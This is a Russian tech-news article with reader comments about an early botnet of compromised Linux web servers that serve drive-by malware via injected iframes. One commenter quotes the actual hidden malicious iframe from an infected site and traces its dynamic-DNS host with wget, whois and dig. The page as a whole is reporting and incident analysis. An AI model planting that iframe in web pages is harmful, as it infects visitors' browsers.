The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Обнаружен первый ботнет из инфицированных web-серверов

13.09.2009 10:47

Отечественные разработчики сервиса Unmask Parasites, ориентированного на выявление зараженных троянскими вставками web-страниц, сообщили об обнаружении ботнет-сети, состоящей из инфицированных web-серверов, работающих под управлением Linux. Все зараженные web-серверы поддерживают обмен данными между узлами и составляют единый ботнет, функционирование которого контролируется из одного центра управления.

На входящих в ботнет хостах, в дополнение к основному http-серверу, на 8080 порту запущен дополнительный http-сервер nginx, ориентированный на обработку запросов, формируемых инфицированными страницами с троянскими JavaScript вставками. Основная задача обнаруженного ботнета - поддержание сети для доставки злонамеренного ПО на машины клиентов, пользующихся содержащими уязвимости версиями web-браузеров, поражение которых происходит при открытии инфицированных web-страниц.

Особое значение придается унификации - выполнению серверной части ботнета и заражающей web-страницы на одном хосте. Использование реально функционирующего домена в "iframe src" или "javascript src" вставке значительно повышает время жизни инфицирующей страницы, по сравнению с указанием внешних ссылок, и позволяет обойти некоторые средства антивирусной защиты, если серверный злонамеренный код обрабатывает запросы в том же домене, хотя и под другим номером порта.

В настоящий момент в ботнете зафиксировано только около сотни серверов, работающих под управлением различных дистрибутивов Linux. Сеть выглядит как первый прототип, и следует иметь в виду, что не представляет большого труда адаптировать серверную часть кода злоумышленников для других Unix-подобных операционных систем. Код работает с правами пораженного аккаунта хостинга. Точно путь внедрения кода пока не определен, но наиболее вероятны три варианта организации загрузки и запуска кода злоумышленника на сервере:

  • Использование широко известных уязвимостей в популярных web-приложениях (например, WordPress версии ниже 2.8.4);
  • Организация словарного подбора простых паролей;
  • Поражение троянским ПО одной из клиентских машин и последующая организация сниффинга FTP-паролей в локальной сети (именно так сейчас осуществляется получение паролей для подстановки троянских JavaScript вставок на сайты).

Web-мастерам и владельцам сайтов настоятельно рекомендуется проконтролировать публикацию отчетов о наличии уязвимостей в используемых общедоступных web-приложениях, произвести установку всех рекомендуемых обновлений, проверить наличие вирусов на машинах в локальной сети и провести аудит используемых паролей.

Из других интересных тенденций развития зомби-сетей можно отметить переход к организации передачи управляющих команд через группы в Google Groups и каналы в Twitter, в то время как ранее управление осуществлялось в основном через IRC.

  1. Главная ссылка к новости (http://www.theregister.co.uk/2...)
  2. OpenNews: Червь поражает устаревшие версии WordPress
  3. OpenNews: Исследование роли Linux серверов в работе ботнетов
  4. OpenNews: Обнаружен самый крупный ботнет в сети
  5. OpenNews: Зафиксирован первый ботнет из Linux-маршрутизаторов
  6. OpenNews: На суперкомпьютере MegaTux будет запущено 1 млн. копий Wine
Лицензия: CC-BY
Тип: Интересно / К сведению
Ключевые слова: linux, botnet
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (181) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.4, Аноним (-), 14:56, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    как всегда. Статья составлена так, как будто "виноват дырявый линукс", а не криворукие веб-мастера, которым обновляться религия не позволяет.
     
     
  • 2.7, none (??), 15:17, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    из чего это видно?
     
     
  • 3.8, Аноним (-), 15:19, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >Для загрузки и запуска кода злоумышленника на сервере используются широко известные уязвимости в >популярных web-приложениях (например, WordPress версии ниже 2.8.4)
     
  • 3.12, Maxim Chirkov (ok), 15:34, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >из чего это видно?

    это обычное явление, если в первом абзаце есть слово Linux, то с огромной долей вероятности в комментариях появится подобное утверждение от человека, который прочитал только первые несколько предложений. Неважно, что следом специально для таких подробно расписано, что Linux вообщем не причем.

     
     
  • 4.102, Аноним (-), 10:37, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Что вы не замечали, так это то, что потом обязательно появится человек, сделавший заявление относительно дураков не читающих до конца, при этом если даже он сам до конца и прочёл, то в смысл не вник.

    А смысл в том, что в статье открытым текстом приписывается мифическим "дистрибутивам Linux" уязвимости всего подряд, а потом выходят отчёты об ошибках в ОС, где в уязвимости GNU/Linux вписана каждая ошибка в студенческом калькуляторе сделанным на лабораторной работе под GNU/Linux, а в уязвимости "других ОС" входит только уязвимость нескольких частей их "ядра".

     
     
  • 5.105, Maxim Chirkov (ok), 11:26, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >А смысл в том, что в статье открытым текстом приписывается мифическим "дистрибутивам
    >Linux" уязвимости всего подряд, а потом выходят отчёты об ошибках в

    Вы не читали текст, цитирую: "В настоящий момент в ботнете зафиксировано только около сотни серверов, работающих под управлением различных дистрибутивов Linux. Сеть выглядит как первый прототип и следует иметь в виду, что не представляет большого труда адаптировать серверную часть кода злоумышленников для других операционных систем."

     
     
  • 6.143, Аноним (-), 14:23, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    > Вы не читали текст

    А вы его не понимали.

    > дистрибутивов Linux

    Это что такое вообще?

    > Сеть выглядит как первый прототип и следует иметь в виду, что не представляет большого труда адаптировать серверную часть кода злоумышленников для других операционных систем.

    То-есть это не адаптация идеи IIS-ботнета (давайте уж на чистоту, ок), а именно приписывание мифическим "дистрибутивам Linux" того что изначально было совсем чужим.

     
     
  • 7.145, Maxim Chirkov (ok), 14:28, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >> Вы не читали текст
    >
    >А вы его не понимали.

    Я написал тест новости, причем изначально стараясь быть как можно более политкорректным ;-)

    > То-есть это не адаптация идеи IIS-ботнета

    Речь про один конкретный ботнет, который пока тестируется и держится на уровне 100 хостов, а не массового поражения. И "другие ОС" - это *BSD, Solaris и прочие Unix-подобные, не думал, что у кого-то может возникнуть ассоциация с Windows (поправил s/других  операционных систем/других Unix-подобных операционных систем/).

     
  • 4.104, Банзай (??), 11:25, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>из чего это видно?
    >
    >это обычное явление, если в первом абзаце есть слово Linux, то с
    >огромной долей вероятности в комментариях появится подобное утверждение от человека, который
    >прочитал только первые несколько предложений. Неважно, что следом специально для таких
    >подробно расписано, что Linux вообщем не причем.

    Вижу, вы или подзабыли или просто ничего никогда не слышали о phpBB "серверном вирусе"?
    10 тыщ погашенных серваков в сутки скорость была.

     
  • 2.159, Аноним (-), 00:48, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>Статья составлена так, как будто "виноват дырявый линукс"

    Это ты так ее прочитал. В статье просто перечисляют факты. Сухая информация и не более. Ты сам ее интерпритировал таким образом. Видимо чтобы найти повод покричать ...

     

  • 1.5, роше (?), 14:57, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    криворукие админы виноваты.
    selinux давно уже использовать надо.
     
     
  • 2.53, Аноним (-), 19:32, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –3 +/
    А что такое SeLinux? Что он позволяет делать в отличии от обычного Linux?
     
     
  • 3.83, 310dej (?), 23:27, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    > А что такое SeLinux? Что он позволяет делать в отличии от обычного Linux?

    А Fedora видели?

     
  • 3.93, ra (??), 05:39, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ru.wikipedia.org/wiki/SELinux
     

  • 1.6, chemtech (?), 15:09, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Эти криворукие мастера поставили web-сервер и забыли))
     
     
  • 2.9, ddd (?), 15:23, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >Эти криворукие мастера поставили web-сервер и забыли))

    криворукие вебмастера используеют фтп вместо sftp(подсистема ssh)
    и в жизни не обновляют веб-приложения.....

     
     
  • 3.21, anon2 (?), 16:57, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>Эти криворукие мастера поставили web-сервер и забыли))
    >
    >криворукие вебмастера используеют фтп вместо sftp(подсистема ssh)
    >и в жизни не обновляют веб-приложения.....

    а как sftp защитит от "сниффинга FTP-паролей в локальной сети"
    я так понимаю sftp позволяет шифровать траффик, а аутентификация - все также по паролю?

     
     
  • 4.27, anon2 (?), 17:24, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    извиняюсь, шифрование траффика как раз таки защитит от сниффинга паролей, но не от подбора пароля.
     
     
  • 5.35, ddd (?), 18:04, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    до чего ж ленивый аноним. sftp(подсистема ssh) позволяет использовать ключи..
     
     
  • 6.44, Oles (?), 19:06, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >до чего ж ленивый аноним. sftp(подсистема ssh) позволяет использовать ключи..

    Ничто не помешает троянчегу переслать куда нужно и ключи, и пароли,  сохранённые в фаре, и снифить клавиатуру.
    Правильное решение - открывать фаерволом только нужные адреса для фтп/ссх.

     
     
  • 7.73, XoRe (ok), 22:02, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>до чего ж ленивый аноним. sftp(подсистема ssh) позволяет использовать ключи..
    >
    >Ничто не помешает троянчегу переслать куда нужно и ключи, и пароли,  
    >сохранённые в фаре, и снифить клавиатуру.

    Ну, для этого нужно поразить комп с паролями.
    А пока указан "снифингф паролей в локалке" - т.е. с другого компа.

    >Правильное решение - открывать фаерволом только нужные адреса для фтп/ссх.

    К сожалению, если локалка, то скорее всего - компы за натом.
    А в этом случае, у компа веб мастера, и у компа с вирусом будет один и тот же внешний ip.
    Хотя... это можно обойти покупкой у прова внешнего ip адреса, или созданием виртуального туннеля.

     
     
  • 8.101, gvf (??), 10:22, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Да че вы голову ломаете Приплатить админу сервера и сканить ничего не на... текст свёрнут, показать
     
     
  • 9.106, Банзай (??), 11:27, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Оть иманна ... текст свёрнут, показать
     
  • 8.172, Некто (??), 10:28, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Дану у кого то локалка на хабах еще Или в качестве шлюза Винда стоит хотя да ... текст свёрнут, показать
     
     
  • 9.173, XoRe (ok), 11:08, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Да кстати Хотя в некоторых локалках до сих пор проканает через приколы с рассыл... текст свёрнут, показать
     
     
  • 10.174, Денис Юсупов (?), 12:56, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Да я даже больше скажу, в сетях с коммутаторами тоже есть техника сниффинга, и д... текст свёрнут, показать
     
  • 7.178, anonymous (??), 13:50, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Ничто не помешает троянчегу переслать куда нужно и ключи, и пароли,  
    >сохранённые в фаре, и снифить клавиатуру.

    ещё как помешает. вот сколько не пытались — у меня так и не смогли. не запускаются у меня трояны, вот что тут поделать?

    аааа, понял! им винда, наверное, нужна, да? ис правами админа?

     

  • 1.10, аноним (?), 15:25, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    кроме всего прочего это свидетельствует о возросшей популярности линукс
     
     
  • 2.11, Square (ok), 15:34, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Никоим образом. Линукс тут- как неуловимый джо - пока никто не озадачился вопросом- он неуловим... Собственно все эти сайты ботнета могут быть на одном хостинге...
     

  • 1.13, Buy (?), 15:54, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • –8 +/
    В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки один-в-один повторяют слова защитников винды - мол это кривые руки, это админ/юзер, винда не причем тут. Никто не любит правды... ;)
     
     
  • 2.18, mma (?), 16:51, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +6 +/
    1)WordPress - при чем тут linux?
    2)простой пароль - при чем тут linux?
    3)перехват трафика ФТП и паролей - - при чем тут linux?

    Более того "с правами пользователя соответсвующего, не root" Даже политика SELinux поумолчанию не разрешит открыть порт 8080, не говоря про все остальные аспекты....

     
     
  • 3.22, Square (ok), 16:58, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –8 +/
    >1)WordPress - при чем тут linux?
    >2)простой пароль - при чем тут linux?
    >3)перехват трафика ФТП и паролей - - при чем тут linux?

    При факте. ботнет работает на хостах с ОС линукс.


     
     
  • 4.23, mma (?), 17:03, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    ботнет может работать на любой ОС, весь вопрос в том на сколько трудно эту ОС заботать и насколько в этом играет человеческий фактор
     
     
  • 5.31, Square (ok), 17:37, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –9 +/
    >ботнет может работать на любой ОС,

    Этот работает на линукс

    >весь вопрос в том на сколько трудно эту ОС заботать
    > и насколько в этом играет человеческий фактор

    Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.

    Более того, исходя из этой тезы, все разговоры о безопасности Линукса- не более чем маркетинговый бред. Поскольку все эти меры безопасности рушатся перед человеческим фактором, и как видим на примере этой новости - позволяют организовать ботнет.

    А скоро вирусы под линукс косяками попрут... :)

     
     
  • 6.32, Frank (??), 17:52, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +11 +/
    > Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.

    Если так рассуждать, то атомные электростанции ничуть не безопаснее ядерных бомб. Давайте вы не будете нести чепуху, а мы вам не будем показывать направление.

     
     
  • 7.34, Square (ok), 18:00, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –8 +/
    Аналогия интересная, а вот вывод вы из нее делаете неверный Атомная бомба если... текст свёрнут, показать
     
     
  • 8.58, Frank (??), 19:55, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –3 +/
    ну-ка, ну-ка Расскажи нам, всезнайка, сколько произошло во всём мире атомных вз... текст свёрнут, показать
     
     
  • 9.60, Square (ok), 19:58, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Речь идет о безопасности Не уклоняйтесь от темы Какие средства для защиты от ч... текст свёрнут, показать
     
     
  • 10.72, Frank (??), 21:54, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Ну, давайте сравним 1 Количество открытых а значит теоретически уязвимых, с в... текст свёрнут, показать
     
     
  • 11.88, Square (ok), 00:29, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • –6 +/
    Этот вопрос некорректен, потому сокращенное количество служб - означает сокращен... текст свёрнут, показать
     
     
  • 12.96, Smile (??), 08:09, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Гетзефактс пробрался на опеннет ответы почти на все пункты есть, пару надо уто... текст свёрнут, показать
     
     
  • 13.151, progr (?), 16:55, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Годами может работать, на собственном опыте знаю Чаще проблемы от кривости рук,... текст свёрнут, показать
     
     
  • 14.179, anonymous (??), 13:56, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    угу свеженькая винда, выставленая голым задом в интернеты, не прожила и получас... текст свёрнут, показать
     
  • 13.156, piglet (?), 18:25, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Ну, стоит у меня винда без фв за железным раутером Переставлял вернее, стави... текст свёрнут, показать
     
     
  • 14.180, anonymous (??), 13:57, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    да ты уже всё сказал если перед виндой стоит какой-то никс, который винду защищ... текст свёрнут, показать
     
  • 13.158, Аноним (-), 00:45, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    В гноме есть ... текст свёрнут, показать
     
     
  • 14.162, dRiZd (?), 09:20, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    И в KDE и в XFCE - панельки присутствуют Так, что вопрос по кнопке ПУСК ... текст свёрнут, показать
     
  • 14.167, Дмитрий Т (?), 16:00, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Последний раз когда рылся в реестре гнома, видел что он является каталогом файло... текст свёрнут, показать
     
     
  • 15.170, аноним (?), 17:20, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    что означает а медленный поиск, чтение и запись б внушительный объем занимаемо... текст свёрнут, показать
     
     
  • 16.206, Дмитрий Т (?), 17:56, 21/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Вы рекламе верите или сами работаете с Windows а Сравните поиск чтение и запис... текст свёрнут, показать
     
  • 13.165, Щекн Итрч (ok), 10:13, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Винда хорошая система при наличии 1 Денег на ее покупку достаточно много дене... текст свёрнут, показать
     
  • 12.97, Frank (??), 08:31, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Спасибо, посмешил Во-первых, почему ты не сообразил, что ответы предполагало... текст свёрнут, показать
     
     
  • 13.163, dRiZd (?), 09:25, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Вы просто не умеете их готовить - ломается и еще как - фиг восстановишь, даже ... текст свёрнут, показать
     
     
  • 14.166, fi (ok), 14:13, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    ну в общем и точки есть - lvm ... текст свёрнут, показать
     
     
  • 15.168, Square (ok), 16:15, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Это система автоматического бекапа и самовосстановления в случае сбоев ... текст свёрнут, показать
     
  • 14.181, anonymous (??), 14:00, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    при наличии достаточной степени упорства можно и половой орган поломать ... текст свёрнут, показать
     
  • 10.76, XoRe (ok), 22:28, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Извольте ознакомиться http www opennet ru openforum vsluhforumID3 58811 html ... текст свёрнут, показать
     
     
  • 11.169, Дмитрий Т (?), 16:35, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Хочется добавить свои 5 копеек Мало того что эти порты открыты, так ещё вспо... текст свёрнут, показать
     
     
  • 12.171, Square (ok), 18:14, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален Можно я подпорчу эффект от ваших 5 копеек Мы говорим... текст свёрнут, показать
     
     
  • 13.182, anonymous (??), 14:04, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    то есть, создание по-умолчанию аккаунта с правами администратора для home-систем... текст свёрнут, показать
     
  • 13.194, Читатель (?), 14:25, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    А в чем проблема поставить то что НУЖНО Не поверите Про КУПИЛ легально Для д... текст свёрнут, показать
     
     
  • 14.197, Square (ok), 16:01, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    gt оверквотинг удален Хе-хе Ну если вы думаете что это смв шара диска - поп... текст свёрнут, показать
     
  • 13.207, Дмитрий Т (?), 18:12, 21/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    У нас большинство задач где это не удобно, не полезно и не правильно Правильно,... текст свёрнут, показать
     
  • 13.208, XoRe (ok), 22:19, 24/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Не подменяйте понятия Кастрация - это сначала было, а потом удалили без возмож... текст свёрнут, показать
     
  • 8.127, nuclight (??), 13:12, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Аналогия нормальная, а вы говорить глупость Покажите, как станция может САМПРОИ... текст свёрнут, показать
     
  • 6.117, Гость (?), 12:22, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Ну поскольку в главу угла поставлен человеческий фактор - следует очень простой вывод - линукс в плане безопасности ничем не лучше виндовс.

    Там же речь не о том, что взломщики получили полный контроль над машинами, они просто воспользовались возможностями обычных пользователей тех систем, которые мало уделяли внимания вопросам безопасности.

     
  • 6.146, qwertykma (?), 15:32, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >А скоро вирусы под линукс косяками попрут... :)

    Вирусы под Линух есть, Вы видимо совсем не в теме.... Однако, ожидать эпедемий равных sasser, redcode, kido, по меньшей мере наивно.


     
     
  • 7.183, anonymous (??), 14:05, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Вирусы под Линух есть, Вы видимо совсем не в теме....

    ага. вирусы есть, просто для них нет ebuild'ов, и простой пользователь не может их установить. %-)

     
  • 6.157, Аноним (-), 00:40, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    > все эти меры безопасности рушатся перед человеческим фактором

    С виндой тоже самое будет если ее не обновлять.

     
  • 3.25, Аноним (-), 17:06, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –5 +/
    >1)WordPress - при чем тут linux?

    при том. крутиться то на линуксах.

     
     
  • 4.47, anonymous (??), 19:13, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +7 +/
    > при том. крутиться то на линуксах.

    Т.е. если я поставлю WordPress на Windows 2008 Server — это будет ГЛОБАЛЬНО и НАДЕЖНО?

     
  • 3.36, klalafuda (?), 18:34, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > 1)WordPress - при чем тут linux?

    Adobe Acrobat & K - причём тут Windows? но ведь дыра в нем оч популярна и ведь косят не на адоба - косят на Microsoft. хотя казалось бы. 'мы в ответе за тех, кого приручили' (с)...

    // wbr

     
  • 2.69, guest (??), 20:56, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки
    >один-в-один повторяют слова защитников винды - мол это кривые руки, это
    >админ/юзер, винда не причем тут. Никто не любит правды... ;)

    Сударь, мелко мыслите. Вы виртуальныесервки видели когда-нибуь? Там зп деньги дают юзать такое старьё!!! Вот и имеем.

     
  • 2.74, XoRe (ok), 22:25, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Главное горе винды - это открытые порты 137-139, 445, и т д Ещё со времен Win95... текст свёрнут, показать
     
     
  • 3.86, ыва (?), 23:56, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Главное горе винды - это открытые порты 137-139, 445, и т.д.

    Если быть точным то 135, 139, 445

    >Ещё со времен Win95 кстати.

    В 9x нету открытого 445

     
     
  • 4.119, XoRe (ok), 12:41, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>Ещё со времен Win95 кстати.
    >
    >В 9x нету открытого 445

    Да, это так.
    Там хватало 135-139)

     
  • 2.99, zazik (ok), 10:13, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >В общем сказка о "неуязвимости" Линукс закончилась, с первым бонетом! А отговорки
    >один-в-один повторяют слова защитников винды - мол это кривые руки, это
    >админ/юзер, винда не причем тут. Никто не любит правды... ;)

    Попытка могла бы быть удачной, но слишком толсто.

     
  • 2.128, Еще один аноним (?), 13:14, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Стоп, ответьте на вопрос - если вы работаете под виндой, а тут вдруг вы обнаруживаете что пользуетесь уязвимым клиентом виндовой аськи, клиентом торрента, где какой-то быдлокодер воткнул strcpy или просто в WinRAR'е вдруг обнаруживается переполнение буфера при хитро сформированном подставном файле архива - вы сразу кричите про уязвимость в винде? Или просто в этих отдельных программах?
     
     
  • 3.160, Аноним (-), 00:51, 15/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Про уязвимость в винде. Все так говорят.
     
     
  • 4.209, XoRe (ok), 22:23, 24/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Про уязвимость в винде. Все так говорят.

    "В Windows нашли уязвимость! WinRar версии 1.х может вызвать у себя переполнение буфера и выпасть с сошибкой!"
    Так чтоли? )

     

     ....большая нить свёрнута, показать (50)

  • 1.16, lazy (??), 16:34, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.
     
     
  • 2.19, Товаристч (?), 16:51, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ищите процессы-долгожители, запущенные пользователями.
     
  • 2.20, Александр (??), 16:55, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    сказано ж, порт 8080
     
  • 2.129, anon as anon (?), 13:18, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.

    Очень просто:
    1.Смотрим исходный код страницы, отдаваемой клиенту.
    2.Наблюдаем, что он обрамлен в ifraime.
    3.В самом конце находим, что есть еще один iframe.
    4.Внутри последнего видим
    src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

    Вот это оно.

    Внешне инкапсуляция в iframe как правило не проходит бесследно - портится дизайн.

    BTW: вот эту фигню наблюдаю прямо сейчас на сайте клиента ХХХ (я сисадмин сетки офиса), хостящегося у провайдера УУУ. сайт работал под NetCat. дир позвонил только что - а что это с нашим сайтом... а вот, это самое и случилось...

     
     
  • 3.131, anon as anon (?), 13:23, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    А вот что дальше wget http pogromski is-a-geek org 8080 ts in cgi open10 --13 ... текст свёрнут, показать
     
     
  • 4.132, anon as anon (?), 13:35, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

    Дальше смотрим

    whois is-a-geek.org | grep -i dyndns
    Registrant Name:DynDNS Hostmaster
    Registrant Email:hostmaster@dyndns.com
    Admin Name:DynDNS Hostmaster
    Admin Email:hostmaster@dyndns.com
    Tech Name:DynDNS Hostmaster
    Tech Email:hostmaster@dyndns.com
    Name Server:NS.DYNDNS.ORG
    Name Server:NS2.DYNDNS.ORG
    Name Server:NS3.DYNDNS.ORG
    Name Server:NS4.DYNDNS.ORG
    Name Server:NS5.DYNDNS.ORG

    Тут уже все должно быть ясно ;) Управлялка ботнета может активироваться по графику, регистрируя любой хост, как текуший мастер.

     
     
  • 5.136, anon as anon (?), 13:41, 14/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >>>src="http://pogromski.is-a-geek.org:8080/ts/in.cgi?open10" width=981 height=0 style="visibility: hidden"

    А вот и он - "северный олень" ;)))

    dig pogromski.is-a-geek.org | grep ^pog
    pogromski.is-a-geek.org. 60     IN      A       195.34.25.36

    Короткоживущая (60 сек) запись в ДНС указывает на сетку $(whois 195.34.25.36 | grep ^netname), в которой расположен мастер ботнета. Всем желающим звонить по телефону $(whois 195.34.25.36 | grep ^phone) и спрашивать $(whois 195.34.25.36 | grep ^person)

     
  • 2.177, anon as anon (?), 13:23, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.

    А теперь могу подсказать, как с этим можно бороться средствами пользователя. Проблема на стороне хостинга и тут уже ничего не поделат, если хостер ССЗБ. Взлом сайта производиться через ftp. Ботнет меняет пароль ftp доступа беквально в течении 30 минут. Затем по логам ftp можно засечь с каких ip и что конкретно загружается (причем, оно сначала даунлодиться на ботнет, а потом грузится) - переписываются корневые индексы. Тут собственно весь ботнет можно и подрубить по найденным в логах ip - просто перекрыть их в файрволе ;) Ну, а пользователям предлагаю удалить все ftp-бюжеты и перейти на ssh.

     
  • 2.185, anonymous (??), 14:09, 16/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Лучше бы кто пару советов на предмет обнаружения симптомов подбросил.

    ps, аудит. но, конечно, первым делом мозг, а то никакие инструменты не помогут.

     

  • 1.24, Spear (?), 17:04, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Такое впечатление, как будто везде был установлен бинарный пакет Apache[+Mysql+Php]+Троян скаченный с какого-то доброго сайта.
     
     
  • 2.26, Анонимус же (?), 17:11, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    А сайт Apache недавно взломали...
     
     
  • 3.28, 4yjoy (?), 17:25, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Сперли SSH-ключ, вот и взломали.
     
     
  • 4.46, Logo (ok), 19:12, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Человек, наверное, имел ввиду, что подкинули туда заразу.
     
  • 4.84, тигар (ok), 23:31, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    сперев ключ залогинились и засплойтив федору получили неплохие права, ага ;)
     

  • 1.29, Аноним (-), 17:26, 13/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • –4 +/
    Да, линукс не при чем, но почему-то ботнет крутится на линуксе. Админы указывают на вебмастеров, что поставили дырявый wordpress, а вебмастерам по большому без разницы, не их задача заботится о безопастности серверов и обновлять этот самый вордпресс. Вот и выходит, что юниксовый хост (и линукс и freebsd и любая другая) ломается на _раз_ залитым скриптом через дыру в веб приложении. Просто некоторые почему-то думают, поставил линукс и все дальше думать не надо. А SELinux обычно мешает, поэтому вырубается в числе первых, привет гентуводам.

    Ботнет может быть и первый, но количество заломанных веб серверов через залитые скрипты думаю что сотни тысяч. Пароли на раз тырятся через сохраненные сессии в FAR и TotalComander. Покажите мне вебмастеров под линуксом, все на винде сидят.

     
     
  • 2.33, Igor Novikov (?), 17:58, 13/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    "Покажите мне вебмастеров под линуксом" - например я работаю с сайтами только через линукс. Просто проще, чем работать на винде, но делать сайт под никсовый хостинг.

    "Пароли на раз тырятся через сохраненные сессии в FAR и TotalComander" - при чем тут линукс? или нынче модно их под вайном пускать? :)

